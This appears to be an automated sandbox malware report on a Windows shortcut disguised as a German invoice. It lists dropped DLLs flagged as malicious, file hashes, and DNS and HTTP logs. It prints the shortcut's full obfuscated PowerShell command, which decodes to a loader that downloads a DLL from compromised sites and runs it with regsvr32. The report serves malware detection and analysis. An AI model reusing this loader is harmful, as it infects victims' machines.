                                                                                                    SHA-512:8744682F4505C23D78077FED48267B02279F8305A68FDC53D799D1B03B7E7EB11CC0139031F47064038B345429E915EAEF23B29DCE396A2572E57E10DF006F23
                                                                                                    Malicious:false
                                                                                                    Preview:p...... ........~..rn..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):365056
                                                                                                    Entropy (8bit):7.158098026415971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTP0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TaRIvgMSS3AyUrhYu3j
                                                                                                    MD5:A3ADC6B3E88B624301624600D1DD0417
                                                                                                    SHA1:6725B4102FBF380C35076E2A1E4288EB19752E89
                                                                                                    SHA-256:130898E612F36C8239EFDA348F31A4A4AF86FE79695DB5E6514AED74C1267CD0
                                                                                                    SHA-512:CB6E0B707FC16D746C47E4CB57B67D48B2EF42EBD223B4C515FCC4914C1B353201168F32F1D8CD211E63803E7317AA0C6D741001D60FE956A7E1A881F8EDBBF2
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1192
                                                                                                    Entropy (8bit):5.325275554903011
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                                                                    MD5:05CF074042A017A42C1877FC5DB819AB
                                                                                                    SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                                                                    SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                                                                    SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2552
                                                                                                    Entropy (8bit):5.987128150587986
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BZmvjkoOjno1eD0YNl8B3iX5VHqDYB1ZXno1eD0YNl8B3iX5vj0ZZz:BZKjkNjnzAa8BW55qDo1ZXnzAa8BW5bw
                                                                                                    MD5:6DF6CD60C82B9BDB4B8C8FCF40D0D16B
                                                                                                    SHA1:CD538C081978D35C581B21D6F0729030A3747B79
                                                                                                    SHA-256:24BC45DB7981F4F05EC825D1FE3DD64C2E8AE1C2D992B32111BB0F9588718AE9
                                                                                                    SHA-512:296C7039295CD3B992EC5D35537EDD7E60EF9BFFBE1BC1B12E0942DE4B6B6E1C4C8819C112C5E8BAF54DA91603CD5386CB5F49BE259DEC087D3B253DD9238AE2
                                                                                                    Malicious:false
                                                                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220523085748..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 123716 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -c &{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):10844
                                                                                                    Entropy (8bit):3.161747097180077
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+Ewa+V:j+s+i+Z+z+B+c+Y+0g+J+j+G+V
                                                                                                    MD5:E392CDA2037DC7CFD318D79001C8D0FF
                                                                                                    SHA1:68C4924FE7ACE3C2DFF71F2E51DF461141ADA639
                                                                                                    SHA-256:50B0EDA72BCE91F4C6DCB97C95F84FED7A2BE125874F5DF55011253C7B269E06
                                                                                                    SHA-512:A010668F372E3B084EF08F826A40C23B5D9D3D6036132C7C244EDB3987CCF862DA3A92E1A11F1F8E0E7717A55370C60A00499C436A1EC6FFEDDEA79814D005CF
                                                                                                    Malicious:false
                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):365056
                                                                                                    Entropy (8bit):7.158098026415971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTP0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TaRIvgMSS3AyUrhYu3j
                                                                                                    MD5:A3ADC6B3E88B624301624600D1DD0417
                                                                                                    SHA1:6725B4102FBF380C35076E2A1E4288EB19752E89
                                                                                                    SHA-256:130898E612F36C8239EFDA348F31A4A4AF86FE79695DB5E6514AED74C1267CD0
                                                                                                    SHA-512:CB6E0B707FC16D746C47E4CB57B67D48B2EF42EBD223B4C515FCC4914C1B353201168F32F1D8CD211E63803E7317AA0C6D741001D60FE956A7E1A881F8EDBBF2
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Fri May 20 06:40:44 2022, atime=Fri Feb 4 06:07:07 2022, length=289792, window=hidenormalshowminimized
                                                                                                    Entropy (8bit):3.7541287581537315
                                                                                                    TrID:
                                                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                                                    File name:Rechnungskorrektur 2022.20.05_1305.lnk
                                                                                                    File size:3595
                                                                                                    MD5:9bb223b115ec73b8419e37ce00051da9
                                                                                                    SHA1:fe98ee24f390ba1778742f32ad4b22220aaa31ff
                                                                                                    SHA256:66cdacf636ffc45e84ff842fe9c6c217641af99f0e41729b2a3ee8488763ea81
                                                                                                    SHA512:2348393dc62690efac626444880fc53fdd278e3dfc69d1bcf28c67bc4bdb2e1625dae806f8ccc4d9f0284dff6eb2ef3c95de4606f43ada56a8565bb94b562b6e
                                                                                                    SSDEEP:48:8CaTKQth35vlneweRCex+Gb68sD2dt6BOvoEMIw1aby:8CaWQth3hlewCG/D2HyObM1
                                                                                                    TLSH:2C7112142DFA5229F1F3DFB1BEE5B994DE6ABA736505999E008403094C51B00ED53E3F
                                                                                                    File Content Preview:L..................F.... .....<..........l....<......l......................5....P.O. .:i.....+00.../C:\...................V.1......T....Windows.@........OwH.T.;....!.........................W.i.n.d.o.w.s.....Z.1......T.<..System32..B........OwH.T.<......
                                                                                                    Icon Hash:fc3cf4c4dcd9d9ed

                                                                                                    General

                                                                                                    Relative Path:
                                                                                                    Command Line Argument:/v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                                                                                                    Icon location:shell32.dll
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 23, 2022 08:57:51.637343884 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:51.898103952 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:51.898380995 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:51.902787924 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.163198948 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176789999 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176830053 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176852942 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176878929 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176903009 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176912069 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.176928043 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176935911 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.176953077 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176975965 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.176985025 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.176999092 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.177009106 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.177025080 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.177058935 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437335968 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437377930 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437402964 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437427044 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437452078 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437477112 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437478065 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437503099 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437526941 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437529087 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437551022 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437573910 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437587976 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437598944 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437617064 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437623978 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437649965 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437674046 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437676907 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437699080 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437715054 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437722921 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437747002 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437768936 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437769890 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437793016 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437812090 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.437855005 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.437895060 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698291063 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698331118 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698355913 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698375940 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698399067 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698422909 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698446989 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698467016 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698492050 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698513985 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698538065 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698563099 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698566914 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698585033 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698607922 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698621035 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698630095 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698652983 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698657036 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698678970 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698698997 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698708057 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698720932 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698733091 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698744059 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698788881 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698811054 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698834896 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698860884 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698862076 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698885918 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698896885 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698909998 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698932886 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698949099 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.698956966 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.698978901 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699002028 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699026108 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699050903 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699074030 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699095964 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699117899 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699120045 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.699141026 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699162960 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.699165106 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699183941 CEST4976380192.168.2.4103.89.5.69
                                                                                                    May 23, 2022 08:57:52.699187994 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699209929 CEST8049763103.89.5.69192.168.2.4
                                                                                                    May 23, 2022 08:57:52.699229002 CEST4976380192.168.2.4103.89.5.69
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 23, 2022 08:57:51.298175097 CEST6427753192.168.2.48.8.8.8
                                                                                                    May 23, 2022 08:57:51.620672941 CEST53642778.8.8.8192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    May 23, 2022 08:57:51.298175097 CEST192.168.2.48.8.8.80x2d69Standard query (0)mandom.co.idA (IP address)IN (0x0001)
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    May 23, 2022 08:57:51.620672941 CEST8.8.8.8192.168.2.40x2d69No error (0)mandom.co.id103.89.5.69A (IP address)IN (0x0001)
                                                                                                    • mandom.co.id
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.449763103.89.5.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    May 23, 2022 08:57:51.902787924 CEST1133OUTGET /assets/TpIIt7SmNBsWCECLoHrS/ HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                    Host: mandom.co.id
                                                                                                    Connection: Keep-Alive
                                                                                                    May 23, 2022 08:57:52.176789999 CEST1135INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Mon, 23 May 2022 06:57:52 GMT
                                                                                                    Content-Type: application/x-msdownload
                                                                                                    Content-Length: 365056
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.1.33
                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 23 May 2022 06:57:52 GMT
                                                                                                    Content-Disposition: attachment; filename="yp1jibJUDxA8rrRg9xQmhd9iHCWQ.dll"
                                                                                                    Content-Transfer-Encoding: binary
                                                                                                    Set-Cookie: 628b30701384e=1653289072; expires=Mon, 23-May-2022 06:58:52 GMT; Max-Age=60; path=/
                                                                                                    Last-Modified: Mon, 23 May 2022 06:57:52 GMT
                                                                                                    X-Cache-Status: MISS
                                                                                                    X-Powered-By: PleskLin
